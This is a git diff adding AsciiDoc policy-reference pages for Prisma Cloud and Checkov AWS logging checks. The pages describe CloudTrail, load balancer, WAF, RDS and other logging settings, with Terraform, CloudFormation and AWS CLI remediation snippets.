+|LOW + +|Subtype +|Build +//, Run + +|Frameworks +|CloudFormation,Terraform,TerraformPlan,Serverless + +|=== + + + +=== Description + + +Container Insights can be used to collect, aggregate, and summarize metrics and logs from containerized applications and microservices. +They can also be extended to collect metrics at the cluster, task, and service levels. 
Using Container Insights allows you to monitor, troubleshoot, and set alarms for all your Amazon ECS resources. +It provides a simple-to-use, native, and fully managed way to investigate ECS issues. +We recommend you enable Container Insights using the AWS CLI for existing clusters, and either the Amazon ECS console or the AWS CLI for new clusters. + +//// +=== Fix - Runtime + + +*AWS Console* + + + +. Log in to the AWS Management Console at https://console.aws.amazon.com/. + +. Open the https://console.aws.amazon.com/ecs/[Amazon ECS console]. + +. In the navigation pane, choose *Account Settings*. + +. To enable the Container Insights default opt-in, check the box at the bottom of the page. + + +*CLI Command* + + +You can use the AWS CLI to set account-level permission to enable Container Insights for any new Amazon ECS clusters created in your account. +To do so, enter the following command. +---- +aws ecs put-account-setting \ +--name "containerInsights" \ +--value "enabled" +---- +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_ecs_cluster +* *Arguments:* setting + + +[source,go] +---- +resource "aws_ecs_cluster" "foo" { + ... + name = "white-hart" ++ setting { ++ name = "containerInsights" ++ value = "enabled" ++ } +} +---- + + +*CloudFormation* + + +* *Resource:* AWS::ECS::Cluster +* *Arguments:* Properties.ClusterSettings + + +[source,yaml] +---- +Resources: + ECSCluster: + Type: 'AWS::ECS::Cluster' + Properties: + ... ++ ClusterSettings: ++ - Name: 'containerInsights' ++ Value: 'enabled' +---- diff --git a/code-security/policy-reference/aws-policies/aws-logging-policies/bc-aws-logging-12.adoc b/code-security/policy-reference/aws-policies/aws-logging-policies/bc-aws-logging-12.adoc new file mode 100644 index 000000000..287c04ab7 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-logging-policies/bc-aws-logging-12.adoc @@ -0,0 +1,107 @@ +== AWS Redshift database does not have audit logging enabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 91c941aa-d110-4b33-9934-aadd86b1a4d9 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/RedshiftClusterLogging.py[CKV_AWS_71] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks
+|CloudFormation,Terraform,TerraformPlan,Serverless + +|=== + + + +=== Description + + +Amazon Redshift logs information about connections and user activities in your database. +These logs help you to monitor the database for security and troubleshooting purposes, a process often referred to as database auditing. +The logs are stored in Amazon S3 buckets. +These provide convenient access with data security features for users who are responsible for monitoring activities in the database. +Enabling S3 bucket logging on Redshift databases allows you to capture all events that may affect the database, which is useful in security and incident response workflows. + +//// +=== Fix - Runtime + + +*AWS Console* + + +To enable Redshift to S3 bucket logging using the AWS Management Console, follow these steps: + +. Log in to the AWS Management Console at https://console.aws.amazon.com/. + +. Open the *https://console.aws.amazon.com/redshift[Amazon Redshift console]*. + +. On the navigation menu, choose *Clusters*, then choose the cluster that you want to update. + +. Choose the *Maintenance and Monitoring* tab. 
+ +Then view the *Audit logging* section. + +. Choose the *Edit* tab. + +. On the Configure audit logging page, choose to Enable audit logging and enter your choices regarding where the logs are stored. + +. Click *Confirm*. +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_redshift_cluster +* *Arguments:* logging - set enable to true. +An example Terraform definition of an Amazon Redshift database with logging enabled, resolving the violation: + + +[source,go] +---- +resource "aws_redshift_cluster" "default" { + ... + cluster_type = "single-node" ++ logging { ++ enable = "true" ++ } +} +---- + + +*CloudFormation* + + +* *Resource:* AWS::Redshift::Cluster +* *Arguments:* Properties.LoggingProperties.BucketName + + +[source,yaml] +---- +Type: "AWS::Redshift::Cluster" +Properties: + ... ++ LoggingProperties: ++ BucketName: "your_bucket" +---- diff --git a/code-security/policy-reference/aws-policies/aws-logging-policies/bc-aws-logging-22.adoc b/code-security/policy-reference/aws-policies/aws-logging-policies/bc-aws-logging-22.adoc new file mode 100644 index 000000000..eeb8ec075 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-logging-policies/bc-aws-logging-22.adoc @@ -0,0 +1,124 @@ +== AWS Elastic Load Balancer v2 (ELBv2) with access log disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| f2a2bcf1-2966-4cb5-9230-bd39c9903a02 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/ELBv2AccessLogs.py[CKV_AWS_91] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|CloudFormation,Terraform,TerraformPlan,Serverless + +|=== + + + +=== Description + + +ELBv2 load balancers provide access logs that capture information about the TLS requests sent to NLBs. +These access logs can be used to analyze traffic patterns and troubleshoot security and operational issues. 
Access logging is an optional feature of ELB that is disabled by default. +There is no additional charge for access logs. +You are charged storage costs for Amazon S3, but not charged for the bandwidth. +After you enable access logging for your load balancer, ELBv2 captures the logs as compressed files and stores them in the Amazon S3 bucket that you specify. + +//// +=== Fix - Runtime + + +*AWS Console* + + + +. Go to the Amazon EC2 console at https://console.aws.amazon.com/ec2/. ++ +In the navigation pane, choose Load Balancers. + +. Select your load balancer. + +. On the Description tab, choose Edit attributes. + +. On the Edit load balancer attributes page, do the following: + +. For Access logs, choose Enable and specify the name of an existing bucket or a name for a new bucket. + +. Choose Save. + + +*CLI Command* + + + + +[source,shell] +---- +aws elbv2 modify-load-balancer-attributes --load-balancer-arn arn:aws:elasticloadbalancing:us-west-2:123456789012:loadbalancer/app/my-load-balancer/50dc6c495c0c9188 --attributes Key=access_logs.s3.enabled,Value=true Key=access_logs.s3.bucket,Value=my-loadbalancer-logs Key=access_logs.s3.prefix,Value=myapp +---- +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_lb +* *Arguments:* access_logs - (Optional) An Access Logs block. +Access Logs documented below. + + +[source,go] +---- +resource "aws_lb" "test" { + ... + name = "test-lb-tf" ++ access_logs { ++ bucket = aws_s3_bucket.lb_logs.bucket ++ prefix = "test-lb" ++ enabled = true ++ } +} +---- + + +*CloudFormation* + + +* *Resource:* AWS::ElasticLoadBalancingV2::LoadBalancer +* *Arguments:* Properties.LoadBalancerAttributes + + +[source,yaml] +---- +Resources: + Resource0: + Type: 'AWS::ElasticLoadBalancingV2::LoadBalancer' + Properties: + ... + LoadBalancerAttributes: ++ - Key: access_logs.s3.enabled ++ Value: "true" +---- diff --git a/code-security/policy-reference/aws-policies/aws-logging-policies/bc-aws-logging-23.adoc b/code-security/policy-reference/aws-policies/aws-logging-policies/bc-aws-logging-23.adoc new file mode 100644 index 000000000..a1feb898f --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-logging-policies/bc-aws-logging-23.adoc @@ -0,0 +1,96 @@ +== AWS Elastic Load Balancer (Classic) with access log disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| b675c604-e886-43aa-a60f-a9ad1f3742d3 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/ELBAccessLogs.py[CKV_AWS_92] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|CloudFormation,Terraform,TerraformPlan,Serverless + +|=== + + + +=== Description + + +These access logs can be used to analyze traffic patterns and troubleshoot security and operational issues. +Access logging is an optional feature of ELB that is disabled by default. + +=== Fix - Runtime + + +*AWS Console* + + +TBA + + +*CLI Command* + + + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_elb +* *Arguments:* access_logs + + +[source,go] +---- +resource "aws_elb" "example" { + ... + name = "test-lb-tf" ++ access_logs { ++ bucket = aws_s3_bucket.lb_logs.bucket ++ enabled = true ++ } +} +---- + + +*CloudFormation* + + +* *Resource:* AWS::ElasticLoadBalancing::LoadBalancer +* *Arguments:* Properties.AccessLoggingPolicy.Enabled + + +[source,yaml] +---- +Resources: + Resource0: + Type: 'AWS::ElasticLoadBalancing::LoadBalancer' + Properties: + ... + AccessLoggingPolicy: + ... ++ Enabled: true +---- diff --git a/code-security/policy-reference/aws-policies/aws-logging-policies/bc-aws-logging-24.adoc b/code-security/policy-reference/aws-policies/aws-logging-policies/bc-aws-logging-24.adoc new file mode 100644 index 000000000..cf38d4166 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-logging-policies/bc-aws-logging-24.adoc @@ -0,0 +1,76 @@ +== Neptune logging is not enabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| a520f182-c20b-4042-95ca-6e0caccf6219 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/NeptuneClusterLogging.py[CKV_AWS_101] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|CloudFormation,Terraform,TerraformPlan,Serverless + +|=== + + + +=== Description + + +These logs can be used to analyze traffic patterns and troubleshoot security and operational issues. +It is recommended that you configure your cluster to export its logs to Amazon CloudWatch. + +=== Fix - Runtime + + +*AWS Console* + + +TBA + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_neptune_cluster +* *Arguments:* enable_cloudwatch_logs_exports + + +[source,go] +---- +resource "aws_neptune_cluster" "Pike" { + cluster_identifier = var.DBClusterIdentifier + + ... ++ enable_cloudwatch_logs_exports = ["audit"] +} +---- + + +*CloudFormation* + + +* *Resource:* AWS::Neptune::DBCluster +* *Arguments:* Properties.EnableCloudwatchLogsExports + + +[source,yaml] +---- +Type: "AWS::Neptune::DBCluster" + Properties: + ... 
++ EnableCloudwatchLogsExports: ["audit"] +---- diff --git a/code-security/policy-reference/aws-policies/aws-logging-policies/bc-aws-logging-31.adoc b/code-security/policy-reference/aws-policies/aws-logging-policies/bc-aws-logging-31.adoc new file mode 100644 index 000000000..c6dc851d3 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-logging-policies/bc-aws-logging-31.adoc @@ -0,0 +1,71 @@ +== AWS WAF Web Access Control Lists logging is disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 6107761b-b8c4-4c2c-9418-e264f5dc11e6 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/WAFHasLogs.py[CKV_AWS_176] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Amazon WAF is a web application firewall service that lets you monitor web requests that are forwarded to Amazon API Gateway APIs, Amazon CloudFront distributions, or Application Load Balancers in order to help protect them from attacks. +To get detailed information about the web traffic analyzed by your Web Access Control Lists (Web ACLs), you must enable logging. +The log entries include the time that Amazon WAF received the request from your AWS resource, detailed information about the request, and the action for the rule that each request matched. +You can also send these logs to an Amazon Kinesis Firehose delivery stream with a configured storage destination. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_waf_web_acl +* *Attribute:* logging_configuration + + +[source,go] +---- +resource "aws_waf_web_acl" "example" { + # ... other configuration ... + logging_configuration { + log_destination = "${aws_kinesis_firehose_delivery_stream.example.arn}" + + redacted_fields { + field_to_match { + type = "URI" + } + + + field_to_match { + data = "referer" + type = "HEADER" + } + + } + } + +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-logging-policies/bc-aws-logging-33.adoc b/code-security/policy-reference/aws-policies/aws-logging-policies/bc-aws-logging-33.adoc new file mode 100644 index 000000000..7104a1174 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-logging-policies/bc-aws-logging-33.adoc @@ -0,0 +1,74 @@ +== AWS WAF2 does not have a Logging Configuration + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 2ab53e6b-4272-43a8-ba6a-cc30add35ca9 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/WAF2HasLogs.yaml[CKV2_AWS_31] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +You can enable comprehensive logging on a web access control list (web ACL) using an Amazon Kinesis Data Firehose stream destined to an Amazon S3 bucket in the same Region. +To do so, you use three AWS services: AWS WAF to create the logs, Kinesis Data Firehose to receive the logs, and Amazon S3 to store the logs. + +NOTE: AWS WAF and Kinesis Data Firehose must be running in the same Region. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_wafv2_web_acl +* *Attribute*: visibility_config - (Required) Defines and enables Amazon CloudWatch metrics and web request sample collection. +See Visibility Configuration below for details. + + +[source,go] +---- +resource "aws_wafv2_web_acl" "example" { + name = "rate-based-example" + description = "Example of a rate based statement." + scope = "REGIONAL" + + ... ++ visibility_config { + cloudwatch_metrics_enabled = false + metric_name = "friendly-rule-metric-name" + sampled_requests_enabled = false + } + + } + ++ resource "aws_wafv2_web_acl_logging_configuration" "example" { + log_destination_configs = [aws_kinesis_firehose_delivery_stream.example.arn] + resource_arn = aws_wafv2_web_acl.example.arn + redacted_fields { + single_header { + name = "user-agent" + } + + } +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-logging-policies/ensure-api-gateway-stage-have-logging-level-defined-as-appropiate.adoc b/code-security/policy-reference/aws-policies/aws-logging-policies/ensure-api-gateway-stage-have-logging-level-defined-as-appropiate.adoc new file mode 100644 index 000000000..a001dcac4 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-logging-policies/ensure-api-gateway-stage-have-logging-level-defined-as-appropiate.adoc @@ -0,0 +1,111 @@ +== API Gateway stage does not have logging level defined appropriately + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| db7e1267-8931-436b-a841-8daf058afffe + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIGWLoggingLevelsDefinedProperly.yaml[CKV2_AWS_4] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +It is generally a good practice to define the logging level for your API Gateway stages appropriately because it allows you to capture and review detailed information about the requests and responses handled by your API. +This can be especially useful for debugging issues, analyzing the usage patterns of your API, and identifying potential performance bottlenecks. +By default, the logging level for API Gateway stages is set to "OFF", which means that no logs are generated. 
You can choose to enable logging at the "ERROR" level, which will capture only log entries that correspond to error responses generated by your API. +Alternatively, you can enable logging at the "INFO" level, which will capture log entries for both error responses and successful requests. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_api_gateway_rest_api, aws_api_gateway_deployment, aws_api_gateway_method_settings + + +[source,go] +---- +resource "aws_api_gateway_rest_api" "ok_example" { + body = jsonencode({ + openapi = "3.0.1" + info = { + title = "ok_example" + version = "1.0" + } + + paths = { + "/path1" = { + get = { + "x-amazon-apigateway-integration" = { + httpMethod = "GET" + payloadFormatVersion = "1.0" + type = "HTTP_PROXY" + uri = "https://ip-ranges.amazonaws.com/ip-ranges.json" + } + + } + } + + } + }) + + + name = "ok_example" +} + + +resource "aws_api_gateway_deployment" "ok_example" { + rest_api_id = aws_api_gateway_rest_api.ok_example.id + + triggers = { + redeployment = sha1(jsonencode(aws_api_gateway_rest_api.ok_example.body)) + } + + + lifecycle { + create_before_destroy = true + } + +} + +resource "aws_api_gateway_stage" "ok_example" { + deployment_id = aws_api_gateway_deployment.ok_example.id + rest_api_id = aws_api_gateway_rest_api.ok_example.id + stage_name = "ok_example" +} + + +resource "aws_api_gateway_method_settings" "all" { + rest_api_id = aws_api_gateway_rest_api.ok_example.id + stage_name = aws_api_gateway_stage.ok_example.stage_name + method_path = "*/*" + + settings { + metrics_enabled = true + logging_level = "ERROR" + } + +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-logging-policies/ensure-cloudtrail-trails-are-integrated-with-cloudwatch-logs.adoc b/code-security/policy-reference/aws-policies/aws-logging-policies/ensure-cloudtrail-trails-are-integrated-with-cloudwatch-logs.adoc new file mode 100644 index 000000000..f77d75be2 --- /dev/null +++ 
b/code-security/policy-reference/aws-policies/aws-logging-policies/ensure-cloudtrail-trails-are-integrated-with-cloudwatch-logs.adoc @@ -0,0 +1,62 @@ +== CloudTrail trail is not integrated with CloudWatch Log + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 0d07ac51-fbfe-44fe-8edb-3314c9995ee0 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CloudtrailHasCloudwatch.yaml[CKV2_AWS_10] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +AWS CloudTrail is a web service that records AWS API calls made in a given AWS account. +The recorded information includes the identity of the API caller, the time of the API call, the source IP address of the API caller, the request parameters, and the response elements returned by the AWS service. +CloudTrail uses Amazon S3 for log file storage and delivery, so log files are stored durably. +In addition to capturing CloudTrail logs within a specified S3 bucket for long-term analysis, real-time analysis can be performed by configuring CloudTrail to send logs to CloudWatch Logs. +For a trail that is enabled in all regions in an account, CloudTrail sends log files from all those regions to a CloudWatch Logs log group. +It is recommended that CloudTrail logs be sent to CloudWatch Logs. + +NOTE: The intent of this recommendation is to ensure AWS account activity is being captured, monitored, and appropriately alarmed on. CloudWatch Logs is a native way to accomplish this using AWS services but does not preclude the use of an alternate solution. + +Sending CloudTrail logs to CloudWatch Logs will facilitate real-time and historic activity logging based on user, API, resource, and IP address, and provides the opportunity to establish alarms and notifications for anomalous or sensitive account activity. 
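The buildtime fix below sets only the log-group ARN. A fuller sketch of the required wiring is shown here; resource and bucket names are illustrative, and note that in addition to the log group, CloudTrail needs an IAM role it can assume to write into that group:

```hcl
# Illustrative sketch only — names and the S3 bucket are placeholders.
resource "aws_cloudwatch_log_group" "trail" {
  name              = "cloudtrail-events"
  retention_in_days = 90
}

# Role that CloudTrail assumes to deliver events to CloudWatch Logs.
resource "aws_iam_role" "cloudtrail_to_cloudwatch" {
  name = "cloudtrail-to-cloudwatch"
  assume_role_policy = jsonencode({
    Version = "2012-10-17"
    Statement = [{
      Effect    = "Allow"
      Principal = { Service = "cloudtrail.amazonaws.com" }
      Action    = "sts:AssumeRole"
    }]
  })
}

resource "aws_iam_role_policy" "write_logs" {
  name = "write-cloudtrail-logs"
  role = aws_iam_role.cloudtrail_to_cloudwatch.id
  policy = jsonencode({
    Version = "2012-10-17"
    Statement = [{
      Effect   = "Allow"
      Action   = ["logs:CreateLogStream", "logs:PutLogEvents"]
      Resource = "${aws_cloudwatch_log_group.trail.arn}:*"
    }]
  })
}

resource "aws_cloudtrail" "main" {
  name                  = "main-trail"
  s3_bucket_name        = "my-cloudtrail-bucket" # assumed to already exist with a suitable bucket policy
  is_multi_region_trail = true
  # The provider expects the ":*" suffix on the log group ARN.
  cloud_watch_logs_group_arn = "${aws_cloudwatch_log_group.trail.arn}:*"
  cloud_watch_logs_role_arn  = aws_iam_role.cloudtrail_to_cloudwatch.arn
}
```

With this in place, CKV2_AWS_10 passes because the trail references a CloudWatch log group, and the role policy scopes write access to that group only.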
+ +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_cloudtrail +* *Arguments:* cloud_watch_logs_group_arn + + +[source,go] +---- +resource "aws_cloudtrail" "aws_cloudtrail_ok" { + name = "tf-trail-foobar" + cloud_watch_logs_group_arn = "${aws_cloudwatch_log_group.example.arn}:*" +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-logging-policies/ensure-postgres-rds-as-aws-db-instance-has-query-logging-enabled.adoc b/code-security/policy-reference/aws-policies/aws-logging-policies/ensure-postgres-rds-as-aws-db-instance-has-query-logging-enabled.adoc new file mode 100644 index 000000000..b21bb25f2 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-logging-policies/ensure-postgres-rds-as-aws-db-instance-has-query-logging-enabled.adoc @@ -0,0 +1,43 @@ +== AWS Postgres RDS have Query Logging disabled + + +=== Policy Details +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| a31de650-cada-4311-97c9-460f7d48e9e7 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/master/checkov/terraform/checks/graph_checks/aws/PostgresRDSHasQueryLoggingEnabled.yaml[CKV2_AWS_30] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Query logging for a PostgreSQL RDS instance is controlled through its DB parameter group, for example the log_statement and log_min_duration_statement parameters. +Enabling query logging records the SQL statements executed against the instance, which supports troubleshooting, performance analysis, and security auditing. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_db_instance, aws_db_parameter_group + +The check passes when the instance's parameter group turns on query logging; the block below is an illustrative sketch (the resource names, parameter group family, and parameter values are examples, not prescribed settings). + +[source,go] +---- +resource "aws_db_parameter_group" "postgres_logging" { + name = "postgres-query-logging" + family = "postgres14" + + parameter { + name = "log_statement" + value = "all" + } + + parameter { + name = "log_min_duration_statement" + value = "1" + } +} + +resource "aws_db_instance" "example" { + engine = "postgres" + ... + parameter_group_name = aws_db_parameter_group.postgres_logging.name +} +---- \ No newline at end of file diff --git a/code-security/policy-reference/aws-policies/aws-logging-policies/ensure-that-cloudformation-stacks-are-sending-event-notifications-to-an-sns-topic.adoc b/code-security/policy-reference/aws-policies/aws-logging-policies/ensure-that-cloudformation-stacks-are-sending-event-notifications-to-an-sns-topic.adoc new file mode 100644 index 000000000..3a4f95f54 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-logging-policies/ensure-that-cloudformation-stacks-are-sending-event-notifications-to-an-sns-topic.adoc @@ -0,0 +1,55 @@ +== AWS CloudFormation stack configured without SNS
topic + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 8251bd2d-4338-45e0-b0c0-e0ce6a92652a + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/CloudformationStackNotificationArns.py[CKV_AWS_124] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Enabling event notifications for your AWS CloudFormation stacks can help you to monitor and track changes to your stacks. +When event notifications are enabled, CloudFormation will send a message to an Amazon Simple Notification Service (SNS) topic each time a stack event occurs. +By doing so, you improve your visibility and can automate responses to stack events. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_cloudformation_stack +* *Arguments:* notification_arns + + +[source,go] +---- +resource "aws_cloudformation_stack" "default" { + name = "networking-stack" + ... ++ notification_arns = ["arn1", "arn2"] +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-logging-policies/ensure-that-detailed-monitoring-is-enabled-for-ec2-instances.adoc b/code-security/policy-reference/aws-policies/aws-logging-policies/ensure-that-detailed-monitoring-is-enabled-for-ec2-instances.adoc new file mode 100644 index 000000000..5f178376b --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-logging-policies/ensure-that-detailed-monitoring-is-enabled-for-ec2-instances.adoc @@ -0,0 +1,52 @@ +== AWS EC2 instance detailed monitoring disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| d1472058-15fb-461b-92ee-31a651cfe914 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/EC2DetailedMonitoringEnabled.py[CKV_AWS_126] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Enabling detailed monitoring for Amazon Elastic Compute Cloud (EC2) instances provides additional data and insights about the performance and utilization of your instances. +Detailed monitoring publishes metrics at one-minute intervals instead of the default five-minute intervals, which can be helpful for capacity planning and optimization.
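+ +When instances are launched from a launch template rather than a standalone aws_instance, detailed monitoring is set in the template's monitoring block. +A minimal sketch follows; the resource name, AMI ID, and instance type are illustrative. + +[source,go] +---- +resource "aws_launch_template" "example" { + name_prefix = "example-" + image_id = "ami-12345678" # illustrative AMI ID + instance_type = "t3.micro" + + # Enables one-minute detailed monitoring for launched instances + monitoring { + enabled = true + } +} +----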
+ +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_instance +* *Arguments:* monitoring + + +[source,go] +---- +resource "aws_instance" "test" { ++ monitoring = true +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-logging-policies/ensure-that-enhanced-monitoring-is-enabled-for-amazon-rds-instances.adoc b/code-security/policy-reference/aws-policies/aws-logging-policies/ensure-that-enhanced-monitoring-is-enabled-for-amazon-rds-instances.adoc new file mode 100644 index 000000000..49843c6aa --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-logging-policies/ensure-that-enhanced-monitoring-is-enabled-for-amazon-rds-instances.adoc @@ -0,0 +1,55 @@ +== AWS Amazon RDS instances Enhanced Monitoring is disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| c45e811c-c5e1-43c8-b63d-42e3fd034f68 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/RDSEnhancedMonitorEnabled.py[CKV_AWS_118] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan,CloudFormation + +|=== + + + +=== Description + + +Enabling enhanced monitoring for Amazon RDS instances can provide you with additional visibility into the performance and health of your database instances. +With enhanced monitoring, you can retrieve real-time performance metrics for your RDS instances at intervals of 1 second, rather than the standard interval of 60 seconds. +This can be particularly useful for troubleshooting performance issues, identifying trends in resource utilization, and detecting potential issues before they become problems. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_db_instance +* *Arguments:* monitoring_interval + + +[source,go] +---- +resource "aws_db_instance" "default" { + allocated_storage = 10 + ... ++ monitoring_interval = 5 +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-logging-policies/logging-1.adoc b/code-security/policy-reference/aws-policies/aws-logging-policies/logging-1.adoc new file mode 100644 index 000000000..c611f5892 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-logging-policies/logging-1.adoc @@ -0,0 +1,144 @@ +== AWS CloudTrail is not enabled with multi trail and not capturing all management events + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 05befc8b-c78a-45e9-98dc-c7fbaef580e7 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/CloudtrailMultiRegion.py[CKV_AWS_67] + +|Severity +|LOW + +|Subtype +|Build +//, Run + +|Frameworks +|CloudFormation,Terraform,TerraformPlan,Serverless + +|=== + + +=== Description + + +AWS CloudTrail is a web service that records AWS API calls for your account and delivers log files to you. +The recorded information includes: the identity of the API caller, the time of the API call, the source IP address of the API caller, the request parameters, and the response elements returned by the AWS service. + +CloudTrail provides a history of AWS API calls for an account, including API calls made via the Management Console, SDKs, command line tools, and higher-level AWS services such as CloudFormation. +The AWS API call history produced by CloudTrail enables security analysis, resource change tracking, and compliance auditing. + +AWS CloudTrail provides additional multi-region security: + +* Ensuring that a multi-region trail exists will detect unexpected activity occurring in otherwise unused regions. +* Ensuring that a multi-region trail exists will enable Global Service Logging for a trail by default, capturing records of events generated on AWS global services.
+* For a multi-region trail, ensuring that management events are configured for all types of Read/Write operations results in the recording of management actions performed on all resources in an AWS account. + +//// +=== Fix - Runtime + + +*AWS Console* + + +To enable global (multi-region) CloudTrail logging, follow these steps: + +. Log in to the AWS Management Console at https://console.aws.amazon.com/. + +. Open the https://console.aws.amazon.com/cloudtrail/[CloudTrail dashboard]. + +. On the left navigation pane, click *Trails*. + +. Click *Get Started Now*. + +. Click *Add new trail*. + +. Enter a trail name in the *Trail name* box. + +. Set the *Apply trail to all regions* option to *Yes*. + +. Enter an S3 bucket name in the *S3 bucket* box. + +. Click *Create*. ++ +If one or more trails already exist, select the target trail to enable global logging, using the following steps: + +. Next to *Apply trail to all regions*, click the edit icon (pencil) and select *Yes*. + +. Click *Save*. + +. Next to *Management Events*, click the edit icon (pencil) and select *All* Read/Write Events. + +. Click *Save*. + + +*CLI Command* + + +To create a multi-region trail, use the following commands: +[,bash] +---- +aws cloudtrail create-trail +--name <trail_name> +--bucket-name <s3_bucket_for_cloudtrail> +--is-multi-region-trail + +aws cloudtrail update-trail +--name <trail_name> +--is-multi-region-trail +---- + +NOTE: Creating a CloudTrail with a CLI command, without providing any overriding options, configures Read/Write Management Events to All. +//// + +=== Fix - Buildtime + + +*CloudFormation* + + +* *Resource:* AWS::CloudTrail::Trail +* *Arguments:* Properties.IsMultiRegionTrail + + +[source,yaml] +---- +Resources: + MyTrail: + Type: AWS::CloudTrail::Trail + Properties: + ... ++ IsMultiRegionTrail: True +---- + +*Terraform* + + +* *Resource:* aws_cloudtrail +* *Arguments:* is_multi_region_trail - (Optional) Specifies whether the trail is created in the current region or in all regions. +Defaults to false. + + +[source,go] +---- +resource "aws_cloudtrail" "foobar" { + name = "tf-trail-foobar" + s3_bucket_name = aws_s3_bucket.foo.id + s3_key_prefix = "prefix" + include_global_service_events = false ++ is_multi_region_trail = true +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-logging-policies/logging-13.adoc b/code-security/policy-reference/aws-policies/aws-logging-policies/logging-13.adoc new file mode 100644 index 000000000..2f3634fc3 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-logging-policies/logging-13.adoc @@ -0,0 +1,127 @@ +== AWS CloudWatch Log groups not configured with definite retention days + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 2ec595da-49df-4802-87eb-2b3b92786bcf + 